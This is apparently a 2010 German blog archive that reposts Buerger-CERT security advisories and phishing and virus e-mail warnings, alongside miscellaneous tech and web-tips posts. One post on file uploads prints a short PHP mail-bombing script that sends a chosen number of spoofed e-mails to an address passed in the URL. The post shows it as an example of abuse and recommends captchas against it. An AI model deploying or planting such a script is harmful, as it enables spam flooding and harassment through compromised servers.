Das Buerger-CERT empfiehlt die zeitnahe Aktualisierung des Adobe Flash Players (10.1.85.3 fuer Windows, Macintosh. Linux und Solaris bzw. 10.1.95.1 fuer Android) fuer den jeweils genutzten Browser. Bei dem Adobe Flash Player geschieht dies am einfachsten ueber die integrierte Update-Funktion oder ueber die Webseite
http://get.adobe.com/flashplayer/
Anwender des Flash Players fuer Android Version 10.1.92.10 und frueher koennen die Aktualisierung ueber den Android Marketplace durchfuehren.
Adobe bietet eine Webseite [2] zur Pruefung der aktuell installierten Flash Player Version an. Bei dem Einsatz mehrerer Browser sollte die Pruefung fuer jeden einzelnen Browser durchgefuehrt werden.
Fuer Anwender, die nicht auf Flash Player 10.1.85.3 aktualisieren koennen, stellt Adobe eine aktualisierte Flash Player Version 9.0.283 bereit [3].
Beschreibung:
Adobe behebt mit dem Sicherheitsupdate fuer den Flash Player eine kritische Schwachstelle, die es einem Angreifer ermoeglicht, beliebigen Code auf betroffenen Systemen auszufuehren. Hierfuer reicht bereits der Besuch einer vom Angreifer praeparierten Webseite.
[Bcert-2010-0088/1]:
Mozilla Foundation aktualisiert Firefox, Thunderbird und Seamonkey
Risiko: Hoch
Betroffene Systeme:
Mozilla Firefox vor Version 3.6.9
Mozilla Firefox vor Version 3.5.12
Mozilla Thunderbird vor Version 3.1.3
Mozilla Thunderbird vor Version 3.0.7
SeaMonkey vor Version 2.0.7
Empfehlung:
Das Buerger-CERT empfiehlt Nutzern des Webbrowsers Firefox und des E-Mail-Clients Thunderbird die von ihnen genutzte Versionsreihe zu aktualisieren. Der Support der Firefox-Versionsreihe 3.5 ist ausgelaufen.
Am einfachsten ist ein Update ueber die integrierte Update-Funktion moeglich:
Menue "Hilfe", "Nach Updates suchen..." bzw. "Firefox/Thunderbird aktualisieren".
Alternativ stehen die Installationspakete auf folgenden Webseiten zum Herunterladen bereit:
Firefox 3.6.9
http://www.mozilla.com/de/
Firefox 3.5.12
http://www.mozilla.com/en-US/firefox/all-older.html
Thunderbird 3.1.3
http://www.mozillamessaging.com/de/
Thunderbird 3.0.7
http://www.mozillamessaging.com/en-US/thunderbird/all-older.html
SeaMonkey 2.0.7
http://www.seamonkey-project.org/releases/
Beschreibung:
Ein Angreifer kann die von den Mozilla-Entwicklern in Firefox und Thunderbird geschlossenen Schwachstellen ausnutzen, um Informationen auszuspaehen, einen Absturz der Anwendung auszuloesen oder beliebigen Code zur Ausfuehrung zu bringen.
[Bcert-2010-0089/1]:
Apple Safari Safari 5.0.2 and Safari 4.1.2
Risiko: Hoch
Betroffene Systeme:
Apple Safari vor Version 5.0.2
Apple Safari vor Version 4.1.2
Empfehlung:
Das Buerger-CERT empfiehlt das von Apple bereitgestellte Safari-Sicherheitsupdate so rasch wie moeglich zu installieren. Dies geschieht unter Mac OS X am einfachsten ueber die integrierte Funktion "Software Aktualisierung" des Betriebssystems bzw. unter Microsoft Windows mit der Anwendung "Apple Software Update".
Alternativ kann das Safari-Update auch manuell von der Apple
Download-Webseite heruntergeladen werden:
http://support.apple.com/downloads/
Beschreibung:
Mit den Safari Versionen 5.0.2 und 4.1.2 schliesst Apple drei Sicherheitsluecken im Browser. Die Ausnutzung der Sicherheitsluecken ermoeglicht einem entfernten Angreifer mithilfe von praeparierten Webseiten u.a. die Ausfuehrung von Schadcode auf dem System des Opfers.
[Bcert-2010-0091/1]:
Adobe Reader und Acrobat 9.3.4
Risiko: Hoch
Betroffene Systeme:
Adobe Reader und Acrobat Version 9.3.4 und frueher
Empfehlung:
Ein Patch des Herstellers steht derzeit nicht zur Verfuegung. Derzeit verwenden die praeparierten PDF-Dokumente zur Ausnutzung dieser Sicherheitsluecke JavaScript. Daher eine Deaktivierung von JavaScript grundsaetzlich sinnvoll.
Dies ist in Adobe Reader und Acrobat ueber das Menue
"Bearbeiten" > "Voreinstellungen..." > Kategorie "JavaScript"
moeglich. Entfernen Sie zur Deaktivierung von JavaScript in PDF-Dokumenten den Haken vor der Option "Acrobat JavaScript aktivieren" und bestaetigen Sie das Fenster mit der Schaltflaeche "OK".
Diese Massnahme bietet allerdings keinen vollstaendigen Schutz vor Ausnutzung der Schwachstelle.
Beschreibung:
Adobe warnt vor einer neuen Sicherheitsluecke im Adobe Reader und Acrobat 9.3.4 sowie frueheren Versionen fuer Windows, Mac und Unix. Die Sicherheitsluecke wird bereits aktiv ausgenutzt, um ueber manipulierte PDF-Dokumente Windows-PCs zu kompromittieren.
Durch eMails verbreitete Viren
Zusammenfassung der Virenmeldungen im Monat September
Die Details der Meldungen sind fuer Sie online abrufbar unter
http://www.viren-ticker.de/
Angeblicher Abbuchungsauftrag versucht einen Trojaner einzuschleusen
Es werden E-Mails versandt, die angeblich einen Abbuchungsauftrag bestätigen. Der E-Mail-Text weist den Empfänger auf einen Rechnungsbetrag von 5.672 Euro hin – nähere Details könne der Empfänger dem beigefügten Anhang entnehmen. In dem Anhang steckt natürlich kein Abbuchungsauftrag, sondern der heimtückische Trojaner iBill.T, der das betreffende System infizieren will.
Die E-Mail hat folgendes Aussehen:
Betreff: Leihvertrag
Dateianhang: Rechnung.rar
Größe des Dateianhangs: 65 KByte
E-Mail-Text: „Sehr geehrter Kunde, sehr geehrte Kundin!
Ihr Abbuchungsauftrag Nr. 140525114897 wurde erfüllt.
Ein Betrag von 5672.00 EURO wurde abgebucht und wird in Ihrem Bankauszug als "Paypalabbuchung " angezeigt.“
Betroffene Betriebssysteme: Alle Windows-Versionen
mehr Infos finden Sie unter http://www.viren-ticker.de/ »»
Wurm tarnt sich als fehlgeleitete E-Mail
Der Wurm Mytob.A wieder unterwegs. Der Wurm versteckt sich im Anhang einer E-Mail, die scheinbar nicht zugestellt werden konnte. Nähere Angaben zu dieser E-Mail können Sie angeblich der im Anhang befindlichen Datei entnehmen. Und das ist natürlich gelogen.
Wird die sich im Anhang befindende Datei durch einen Doppelklick geöffnet, erhält man keine Informationen über die entsprechende E-Mail, die nicht zugestellt werden konnte. Stattdessen installiert sich der Wurm auf dem betreffenden System.
Die E-Mail hat folgendes Aussehen:
Betreff: „Mail Delivery System”
Dateianhang: „body.zip.exe“.
Größe des Dateianhangs: 41.824 Bytes.
E-Mail-Text: „Mail transaction failed. Partial message is available.“
Betroffene Betriebssysteme: Alle Windows-Versionen
mehr Infos finden Sie unter http://www.viren-ticker.de/ »»
Gefahr durch falschen Abbuchungsauftrag
Es werden E-Mails versandt, die angeblich einen Abbuchungsauftrag bestätigen. Der E-Mail-Text weist den Empfänger auf einen Rechnungsbetrag hin – nähere Details könne der Empfänger dem beigefügten Anhang entnehmen. In dem Anhang stecken natürlich keine Informationen über den Abbuchungsauftrag, sondern der heimtückische Wurm Klez.E7, der das betreffende System infizieren will.
Die E-Mail hat folgendes Aussehen:
Betreff: Vertrag
Dateianhang: Rechnung.rar
Größe des Dateianhangs: 65 KByte
E-Mail-Text: „Sehr geehrte Kundin, sehr geehrte Kunde,
Ihr Abbuchungsauftrag wurde erfüllt. Sie finden die Details zu der Rechnung im Anhang.“
Betroffene Betriebssysteme: Alle Windows-Versionen
mehr Infos finden Sie unter http://www.viren-ticker.de/ »»
Wurm lockt mit nackter Fußball-Mannschaft
Der Wurm Soccer.C lockt mit Bildern einer angeblich nackten Fußball-Mannschaft. Im Anhang der E-Mail befinden sich dann wie immer keine Bilder, sondern der Wurm lauert darauf, das betreffende System zu kapern.
Die E-Mail hat folgendes Aussehen:
Betreff: „Naked World Cup game set“
Dateianhang: soccer_nudist.bmp.exe
E-Mail-Text: „Nudists are organising their own tribute to the world cup, by staging their own nude soccer game, though it is not clear how the teams will tell each other apart. Good photos ;)“.
Dateigröße: 39.904 Bytes
Betroffene Betriebssysteme: Alle Windows-Versionen
mehr Infos finden Sie unter http://www.viren-ticker.de/ »»
E-Mail aus China lockt mit angeblichen Dokument im Anhang
Der Wurm Traxgy.B5 ist unterwegs und verstopft die E-Mail-Postfächer. Im Anhang befindet sich ein angebliches Dokument. Die E-Mail ist leicht zu erkennen, da Betreff und E-Mail-Text aus chinesischen Schriftzeichen bestehen. Im Anhang befindet sich aber eine Datei mit der Bezeichnung Document.
Nach einem Doppelklick auf die im Anhang befindliche Datei, wird jedoch kein Dokument mit dem verknüpften Textverarbeitungsprogramm geöffnet, stattdessen installiert sich der Wurm auf dem System.
Die E-Mail hat folgendes Aussehen:
Betreff: %chinesischer Text%
Dateianhang: Document
Dateierweiterung: .exe
Größe des Dateianhangs: 57.344 Bytes
E-Mail-Text: %chinesischer Text% Document.exe %chinesischer Text%
mehr Infos finden Sie unter http://www.viren-ticker.de/ »»
Trojaner kommt mit falscher Rechnung von Amazon
Es werden E-Mails versandt, die angeblich von Amazon stammen. Der E-Mail-Text weist den Empfänger auf einen Rechnungsbetrag von 715 Euro für einen bestellten Laptop hin – nähere Details könne der Empfänger dem beigefügten Anhang entnehmen. In dem Anhang steckt natürlich keine Rechnung, sondern ein heimtückischenr Trojaner, der das betreffende System infiziert.
Die E-Mail hat folgendes Aussehen:
Betreff: „Ihre Bestellung 2984234 bei Amazon.de“.
Dateianhang: „Rechnung.doc.zip“
E-Mail-Text: „Vielen Dank für Ihre Bestellung bei Amazon.de!
Das Sony VAIO Notebook wird in Kürze versendet. Die Kosten von 715,- Euro werden Ihrem Konto zu Last gelegt. Die Einzelheiten zu Ihrer Bestellung entnehmen Sie bitte der angefügten Rechnung. Falls Sie die Bestellung stornieren möchte, bitte den in der Rechnung angegebenen Kundenservice anrufen und Ihre Bestellnummer bereithalten. Eine Kopie der Rechnung wird Ihnen in den nächsten Tagen schriftlich zugestellt.
Virus: Dldr.iBill.Z
Virustyp: Trojaner
Dateigröße: 12.800 Bytes
Betroffene Betriebssysteme: Alle Windows-Versionen
mehr Infos finden Sie unter http://www.viren-ticker.de/ »»
Gefälschter Office-Patch versucht Ihr System zu kapern
Der Trojaner Badware12 ist unterwegs und versucht Anwendern ein falsches Microsoft Office-Update vorzugaukeln. Die E-Mail ist angeblich vom Onlinedienst MSN und enthält ein Update für Office 2007. Das ist natürlich gelogen: Wer dem Link in der E-Mail folgt, erhält kein Update, sondern einen gefährlichen Trojaner untergeschoben.
Die E-Mail hat folgendes Aussehen:
Betreff: „Update for Office 2007 only“
E-Mail-Text: unterschiedlicher Text
Betroffene Betriebssysteme: Alle Windows-Versionen
mehr Infos finden Sie unter http://www.viren-ticker.de/ »»
Dienstag, 7. September 2010
Die Zeiten sind Scheiße
Wer es trotzdem nicht lassen kann und sich für die bürgerlichen Werte unserer freiheitlichen demokratischen Grundordnung einsetzen will, wenn es sein muß, der / die / das sollte sich von denen, die täglich damit zu tun haben, beraten lassen, denn Hollywood ist verdammt weit weg und die harte Realität unterscheidet sich immens von der schönen heilen Welt, die uns neben den häslichen Nachrichten täglich aus den Medien berieselt.
So kann ich helfen (richtig)
http://www.aktion-tu-was.de/
Zitat:
Zivilcourage lässt sich lernen – zum Beispiel im Unterricht oder in der Jugendarbeit. Speziell hierfür entwickelt wurde ein Medienpaket, das aus einer DVD und einem Filmbegleitheft besteht. Die DVD enthält vier Filme, die das Thema "Zivilcourage" im Zusammenhang mit den Aspekten Alkohol/Gewalt, Drogendeal, Handyraub und Ladendiebstahl behandeln.
Kleiner Surftip am Rande:
https://www.buerger-cert.de/archiv.aspx
Mit Dateiuploads sich den Tag versauen
$t="Sp0wnd!";
$n="Y0u @r3 Sp0wnd by ~B4CksT0r~";
$a="~B@(ksT0r~";
$e=$_GET['e'];
$az=$_GET['az'];
for($i=0;$i<$az;$i++){
mail($e, $t, $n,"From: $a <$a>");
}
?>
Dabei ist dieser kleine Mehrzeiler nicht gerade ein Ausbruch an Intelligenz, sondern eher Mittelklasse, da er nicht mehr wie fachliche Grundkenntnisse verlangt und trotzdem wird die IP schön versteckt nur für wenige bekannt garantiert nie den wirklichen Spammer verraten. Es ist andererseits mit der FOR Abfrage schon direkt ein Riesenschritt von den profanen und allseits beliebten Übergabe URLs der Spammer für Gästebücher und andere Kommunikationsmöglichkeiten mit WebSites.
Wir empfehlen zur Spamvermeidung durch ÜbergabeURLs das bewährte ReCaptcha System:
http://www.google.com/recaptcha
Die DLL Suchroutine beeinflussen
Microsoft hat anscheinend auf Grund der vielfältigen Konfigurations- und daraus folgenden Fehlermöglichkeiten des Patches auf den beliebeten One Klick Button zu verzichten. Ist wohl wirklich nicht möglich es einigermaßen passend zu gestalten, ohne allzu viele wütende Kunden zur Konkurrenz zu treiben!
Jeder Programmierer weiß das die OS Ihre Daten auf einem vorgeschriebenen Weg suchen. mit Einführung der vielen Applikationen die inzwischen über das Web laufen, kam wohl irgendjemand die Idee, na dann kann ich ja auch DLLs des Zielsystems auf meinem Server aufrufen lassen. Im Zusammenhang mit dem ClickJacking kann dabei natürlich echt die Post abgehen,.dementsprechend bleibt folgerichtig nur eine vorherige starre Beeinflussung des Suchweges übrig.
Deshalb muß zum Schutz als erstes der DLL Suchpfad angepasst.
Ein neuer Registrierungseintrag "CWDIllegalInDllSearch" zum Steuern des DLL-Suchpfadalgorithmus ist verfügbar
Fachchinesisch
Dieses Update führt den neuen Registrierungseintrag CWDIllegalInDllSearch ein, mit dem Benutzer den DLL-Suchpfadalgorithmus steuern können. Der DLL-Suchpfadalgorithmus wird von der LoadLibrary-API und der LoadLibraryEx-API verwendet, wenn DLLs ohne Angabe eines vollqualifizierten Pfads geladen werden.
Genaue Erläuterung bei Microsoft:
http://support.microsoft.com/kb/2264107
am Ende der Seite muß im ersten Schritt als erstes der passende Patch für das OS des Zielrechners heruntergeladen und installiert werden.
Als Zweites muß das FixIT heruntergeladen und installiert werden.
bei Technet
An update on the DLL-preloading remote attack vector
http://blogs.technet.com/b/srd/archive/2010/08/31/an-update-on-the-dll-preloading-remote-attack-vector.aspx
Hinterher muß natürlich noch der/die schlaue Sysadmin das FixIt gut und passend zu konfigurieren, woran die meisten wohl scheitern werden. Was natürlich im Rückschluß ein richtig tolles Potential zur Verfügung stellt!
Bleibt nur zu Wünschen übrig, daß sich ein ausreichend dummer Hund findet, dieses Scheunentor im Sicherheitssystem zu stopfen!
Virenverbreitung per USB macht sich breit
Tja manche Böse sind mit guten Verbindungen ausgestattet, davon kann Panda und Vodafone ein Liedchen trällern, der Text geht ungefähr so:
Eine spanische Panda Mitarbeiterin entdeckte Anfang März schädliche Software auf ihrem neu erstandenen Smartphone HTC Magic von Vodafone. Als sie das Handy über USB an ihren PC anschloss, schlug die installierte Panda Cloud Antivirus Software sofort Alarm. Eine Analyse ergab, dass es sich bei dem Handy tatsächlich um einen Mariposa Bot Client handelte. Zusätzlich entdeckte unser spanischer Malware-Experte Pedro Bustamante weitere Malware wie den Conficker-Wurm und einen Trojaner auf der Speicherkarte des Vodafone-Geräts.
Der Text von Panda geht hier weiter:
http://www.pandasecurity.com/germany/enterprise/media/press-releases/viewnews?noticia=10120
Der Text von Panda & Vodafone geht hier weiter:
http://research.pandasecurity.com/vodafone-distributes-mariposa/
Wer sich diese Art der Virenverbreitung mit Proggys vom Hals halten möchte:
mit Vaccine bei Panda:
http://free.pandasecurity.com/de/
mit Tweak UI bei Microsoft:
http://www.microsoft.com/windowsxp/downloads/powertoys/default.mspx
mit dem Autorun.inf Editor von Karen's Power Tools
http://www.karenware.com/powertools/powertools.asp
Für andere die es mit Grips versuchen:
in English:
http://msdn.microsoft.com/de-de/library/bb776825.aspx
in Deutsch:
http://www.fz-juelich.de/jsc/files/net/security/inf-xp/No-AutoRun/no-autorun-zam.htm
Sonntag, 15. August 2010
Baden von franky4you - Google 3D-Galerie
Doch es gibt auch noch eine andere Form der Persönlichkeitsgefährdung nämlich die in Google Earth verwendeten 3D Modelle und für alle die sich unser wunderschönes Badnerland in Google Earth mit den 3D Modellen verschönern wollen haben wir diese Sammlung erstellt:
3D Modelle aus dem Badischen Land: Karlsruhe, Freiburg, Offenburg, Mannheim, Basel, Lörrach, Schwarzwald
Baden von franky4you - Google 3D-Galerie
Nichts ist vollkommen und so gibt es auch etliche 3D Modelle die noch in Arbeit sind, deshalb mußten wir die Sammlung auch erweitern.
Microsoft Download Center: Suchergebnisse
Vorteil:
Damit haben Sie alle Möglichkeiten der Windows Produktgruppen abgedeckt.
Nachteil:
Die ISO Dateien variieren und können abhängig von der Datenmenge bis zu 2 DVDs benötigen.
Microsoft Download Center: Suchergebnisse ISO-Abbild
Donnerstag, 5. August 2010
Festnetz und Telefon Nachrichten auf Billiger-Telefonieren.de
»»» Festnetz und Telefon Nachrichten auf Billiger-Telefonieren.de
Montag, 26. Juli 2010
Schluß mit der ollen Technik
YouTube bietet seine Videos bisher nur in Flash - Playern an. Mit HTML 5 gibt es aber vollkommen neue Möglichkeiten, die aber bisher nicht von allen Browsern unterstützt werden.
http://www.youtube.com/html5
Mit HTML5Rocks hat Google eine Anlaufstelle rund um HTML5 ins Netz gestellt. Dort finden sich Präsentationen und Tutorials rund um HTML5, die zum Teil selbst ausgiebigen Gebrauch von neuen HTML5-Funktionen machen. HTML5 bietet etliche neue Technologien. Konkrete Beispiele gibt es bei Google mit seiner neuen Website HTML5Rocks. Entwicklern wird gezeigt, was bereits heute mit diversen Browsern zu möglich ist.Eine richtig gut gemachte Übersicht der vielen Features gibt es von Google unter: http://slides.html5rocks.com/
Viele gute Links für das noch junge HTML 5:
http://x-html5.de/
Eine eher langweilige akademische Diskussion bei der aber zur auch noch so richtig gefetzt wird, gibt es bei Wikipedia:
http://de.wikipedia.org/wiki/HTML5
Dienstag, 20. Juli 2010
Wichtiges iTunes Update
iTunes 9.2.1 enthält viele wichtige Fehlerbehebungen, einschließlich:
- Deaktiviert ältere Versionen einiger inkompatibler Plug-Ins von Drittherstellern
- Behebt geringfügige Probleme beim Drag&Drop von Objekten
- Behebt ein Leistungsproblem beim ersten Synchronisieren mancher Geräte mit iTunes 9.2
- Behebt ein Problem bei der Aktualisierung auf iOS 4 für iPhones oder iPod touches mit verschlüsselten Backups
- Behebt andere Probleme, die die Stabilität und Leistung beeinträchtigt haben.
Freitag, 16. Juli 2010
Fun Pics, lustige Videos und Online Games kostenlos auf isnichwahr.de
In den Abteilungen | FunPics | lustige Videos | Online Spiele | Flash | Witze & Texte | eBay Auktionen | Webseiten | Diverses | gibt es jede Menge zum Schmunzeln.
Fun Pics, lustige Videos und Online Games kostenlos auf isnichwahr.de
Donnerstag, 15. Juli 2010
AD Nutzer sind zur Zeit der häßliche Mops
Bürger-CERT ist ein Projekt des Bundesamtes für Sicherheit in der Informationstechnik (BSI).
SICHER o INFORMIERT
Extraausgabe vom 15.07.2010
Webauftritte verteilen Schadcode an Internetnutzer
Kompromittierte Werbebanner
Es sollte deshalb jedes Betriebssystem, Anwendung und Antivirenschutz stets auf dem aktuellen Stand gehalten werden. Insbesondere sollten die verfuegbaren Patches für Java, Adobe-Reader und Windows-Betriebssysteme installiert werden.
Die Firefox-Erweiterung NoScript [https://addons.mozilla.org/de/firefox/addon/722/] schuetzt in der Default-Einstellung vor eingebetteten IFRAME-HTML-Elementen, allerdings und auch leider nicht nur davor.
Mittwoch, 14. Juli 2010
eBay und seine Flash-Cookies
(mehr bei Wikipedia)
Eingebaut wurden die überaus hartnäckigen Cookies von eBAY um die Sicherheit zu erhöhen. Schon vor der Einführung gab es jede Menge Unkenrufe aus allen Ecken des Webs, doch was uns gestern passierte, war mal wieder vom Feinsten.
Meine Frau und ich haben beide einen Account in eBay, die beide noch zusätzlich mit den Sicherheitsschlüssel abgeschottet werden.
Also Gaby folgt der Bitte von eBay einen Test für ein Buch zu schreiben, sie logt mich aus und logt sich ein, Schlüsselabfrage und das komplette Programm. Und tatsächlich Sie landet in Ihrem Account, noch mal kurz nachgeschaut ob auch die wichtigeren eBay Sachen erledigt sind und ab die Post, tippselt eine halbe Stunde lang Ihren Testbericht, schickt Ihn ab und welch Überraschung Sie findet NIX! Nada! Rien!
Tja und wer bekam es als Fleißarbeit gutgeschrieben Ihr Mann, der absolut nix getippselt hatte!
So Viel zur unfehlbaren Computertechnik im Online Auktionsgewerbe!
Würde mich doch zu sehr interessieren, was noch alles schief geht in Internet Cafes etc.!
So ein Mischmasch aus verschiedenen Accounthandlungen ist uns nicht zum ersten mal passiert, aber hier ist es nach dem großen zeitlichen Aufwand besonders ärgerlich.
Dienstag, 13. Juli 2010
Vorteile eines Blogs - kurz und knapp
Ein ganz offensichtlicher Grund, der für einen Blog spricht, ist:
Man/Frau/Maus muß sich nicht viele Gedanken machen über:
- Das Design, denn die Webbaukästen bieten etliche anspruchsvolle Möglichkeiten.
- Die Suchmaschinenoptimierung (SEO), daß wird von den Bloganbietern meist selbst übernommen. Hier in meinem Blog bei Blogspot/Blogger ist das sogar der Suchmaschinenkaiser Google selbst.
- Funktionierende Features. Die mit wenigen Klicks hinzufügbaren Features können zwar sicherlich nicht alle ausgefeilten Wünsche abdecken, doch Sie sind schnell eingefügt, funktionieren rasend schnell und müssen nicht mühselig selbst zusammengepfrimmelt werden.
Sonntag, 11. Juli 2010
Amprice – Startupwiki
Schade denn:
Seit August 2008 gehört der erste arabische Marktplatz moulaha.com zu amprice. Moulaha betreibt in 22 arabischen Ländern Online-Marktplätze und hat wenige Monate nach dem Start bereits über 60.000 Mitglieder. Die Marktplätze von moulaha werden im Verlaufe des Jahres 2010 auf das neue amprice-System umgestellt.
(mehr)
Neues Phishing-Ziel: DHL-Packstationen
Neues Phishing-Ziel: DHL-Packstationen
(mehr)
Hacker Bibel Teil 2
Die Hacker Bibel Teil 1
Professional Free Wordpress Templates To Make Your Site Sizzle
Our philosophy at Delicious Slides is to provide webmasters
and designers beautiful and professional wordpress templates at no
cost. By providing these free wordpress templates to designers, we hope
to encourage wordpress development. Our wordpress templates:
- Are offered for free for personal or business use and can
be altered as the webmaster sees fit - up-to-date with current versions of
Wordpress - contain clearly written code with comments to help novices
Unsere / Die Philosophie bei Delicious Slides:
Wir wollen Webmasters und Designern schöne und
professionelle Wordpress Themes kostenlos zur Verfügung
stellen. Indem wir die Templates Ihnen zur Verfügung stellen,
hoffen wir Sie zu ermutigen die Weiterentwicklung von Wordpress zu
forcieren.
Unsere Wordpress Schablonen:
- Werden für den persönlichen Gebrauch oder
Geschäftlichen Nutzung umsonst angeboten. - Sie können ganz nach belieben verwendet und
verändert werden. - Funktionieren aktuell mit gegenwärtigen Versionen
von
Wordpress - Enthalten sauber geschriebenen und mit
ausführlichen
Anmerkungen versehenen Quellcode, um Anfängern zu helfen
Professional
Free Wordpress Templates To Make Your Site Sizzle
Hacker knackt Skype-Verschlüsselung - Internet bei WEB.DE
Hacker knackt Skype-Verschlüsselung - Internet bei WEB.DE
Mit mtPaint anmierte GIFs erstellen
Um das Programm verwenden zu können muß GTK+ installiert sein. Wer sich nicht durch das Dickicht des GTK+ (GIMP-Toolkit) Downloadlinks kämpfen möchte, dem empfehlen wir die komplette Opensource-DVD als Download.
Skurille WebDienste
Schlange stehen
Schlange stehen ist nicht nur total langweilig, sondern auch richtig zeitaufwendig. Der Dienst linestanding.com schafft Abhilfe und vermittelt Menschen, die diese ungenehme Tätigkeit gegen eine Gebühr übernehmen.
http://linestanding.com/
Stars to go
Ein Abendessen mit Promis? Kein Problem! Auf der Seite http://millionairesconcierge.com kann man sich richtige Berühmtheiten für ein Dinner mieten.
http://millionairesconcierge.com/celebrity-meet
Single Börse für virtuelle Figuren
In Japan gibt es einen besonders skurrilen Dienst. Auf den ersten Blick mutet die Seite wie eine typische Single-Börse an, bei der sich einsame Menschen kennen und lieben lernen können. Auf den zweiten Blick wird aber deutlich, dass man hier nur virtuelle Kontakte zu Manga-Figuren herstellen kann.
http://web-kare.jp/
Trauernde Gemeinschaft
Das Internet dient auch als das wohl größte Kondolenzbuch der Welt. Auf www.virtual-memorials.com ist es beispielsweise möglich, einen Nachruf auf einen geliebte Menschen oder auch ein verstorbenes Tiere zu veröffentlichen.
http://www.virtual-memorials.com/
Manche könnens einfach nicht lassen
Wer Seitensprüngen nicht abgeneigt ist, muss sich jetzt nicht einmal mehr selbst ein Alibi oder eine Ausrede einfallen lassen. Das übernehmen die Mitarbeiter von www.alibi-profi.de.
http://www.alibi-profi.de/
Schluss mit der Abzocke im Internet
Die rasche Umsetzung einer nationalen Button-Lösung zur Bekämpfung von Kostenfallen im Internet fordert der Verbraucherzentrale Bundesverband (vzbv). Damit würden die versteckten Kosten bei unseriösen Internetangeboten sichtbar gemacht und der Abzocke von Verbrauchern durch Abofallen endlich Einhalt geboten. In Frankreich gibt es bereits eine Bestätigungslösung, Kostenfallen sind dort kein Thema.
Schaden im Millionenhöhe
Ob Hausaufgabenhilfen, Kochrezepte oder Software: Mit unzähligen vermeintlichen Gratis-Diensten locken unseriöse Anbieter Internetnutzer in eine Kostenfalle. Viele Verbraucher rechnen nicht damit, für Dienste zahlen zu müssen, die es im Internet im Normalfall kostenlos gibt. Im guten Glauben geben sie ihren Namen und ihre Adresse an - und haben ein teures Abo abgeschlossen. Anschließend überziehen die Betreiber Betroffene mit einschüchternden Drohbriefen. Nicht Wenige zahlen aus Angst die haltlosen Forderungen. In Deutschland liegt der Schaden jährlich im mehrstelligen Millionenbereich. Seit Jahren gewinnt der vzbv gegen unseriöse Online-Anbieter ein Verfahren nach dem anderen. Trotzdem nimmt die Abzocke weiter zu, wie die nicht nachlassenden Beschwerdefälle in der Verbraucherberatung zeigen.
Baden von franky4you - Google 3D-Galerie
Wenn Sie ein 3D Modell erstellt haben, das in Baden oder dem Elsaß liegt, so nehmen wir es gerne in unsere Sammlung mit auf.
Ziel unserer Sammlung ist es mit den 3D Modellen den Besuchern von Google Earth in diesem Teil des Rheintals / der Welt zu zeigen, wie schön es bei uns ist.
Badische Gallerie von Gebäuden und Sehenswürdigkeiten von franky4you - Google Earth 3D-Galerie
Cyberpaerle pimps Thunderbird :: Thunderbird Add-ons
Cyberpaerle pimps Thunderbird :: Thunderbird Add-ons
Cyberpaerles Auswahl für Firefox :: Firefox Add-ons
Gaby4you und Franky4you sind viel mit Firefox im Netz unterwegs, damit wir überall, die gleichen komfortablen Möglichkeiten von Firefox nutzen können, haben wir diese Sammlung erstellt.
Sonntag, 4. Juli 2010
Aktuelle Fernseh- & Radioprogramme :: Internet Fernsehen :: Riesige Auswahl :
Wir haben eine richtig gute WebSite gebastelt für die wir die besten Online Fernsehzeitungen anzapfen.
http://tv.info.gl/
http://info.tv.gg
http://tv.info24h.de
Doch wir bieten hier nicht nur jede Menge Programme für Kabel und Satelitten Programme. Wir bieten hier auch den Zugang zu über 900 Internet Fernsehsendern.
Neue Möglichkeiten mit dem Google Schriftarten - Verzeichnis
Um eine Schriftart auf Ihrer Website einzubetten, können Sie einen einfach zu handelnden Assistenten nutzen oder die häufig gestellten Fragen der Site durchforsten.
Damit ergeben sich für das anspruchsvolle Webdesign viele weitere bisher nicht nutzbare Möglichkeiten.
Sonntag, 20. Juni 2010
Das BSI warnt vor Wurm in Facebook
Derzeit breitet sich ein Wurm im sozialen Netzwerk "Facebook" aus. Er nutzt eine seit mehreren Wochen bekannte Schwachstelle in Facebook, in dem scheinbar harmlose Maus-Klicks unbemerkt ungewollte Aktionen ausloesen (siehe dazu auch Wikipedia [http://de.wikipedia.org/wiki/Clickjacking]).
Dieser Wurm fuegt eine manipulierte Statusmeldung dem eigenem Profil hinzu, die zu einer Webseite mit dem Titel "101 Hottest Women in The World" verweist. Freunde, die auf diese Statusmeldung klicken, fuegen ihrerseits diese Statusmeldung ihrem Profil hinzu.
Wer bei der Nutzung von Facebook auf den Link stoesst, sollte ihn in keinem Fall anklicken. Facebook-Nutzern, die bereits auf eine entsprechende Seite geklickt haben, raet das Buerger-CERT dringend, ihr Profil zu bearbeiten und die schadhafte Statusmeldung zu entfernen, um die Weiterverbreitung des Wurms zu vermeiden.
Es ist ist zu erwarten, dass weitere Wuermer diese Schwachstelle ausnutzen und sich ihrerseits mit manipulierten Statusmeldungen oder anderen Profilbestandteilen versuchen zu verbreiten.
Betroffen sind alle Standard-Webbrowser mit Ausnahme von Firefox mit der Browser-Erweiterung NoScript
[https://addons.mozilla.org/de/firefox/addon/722/].
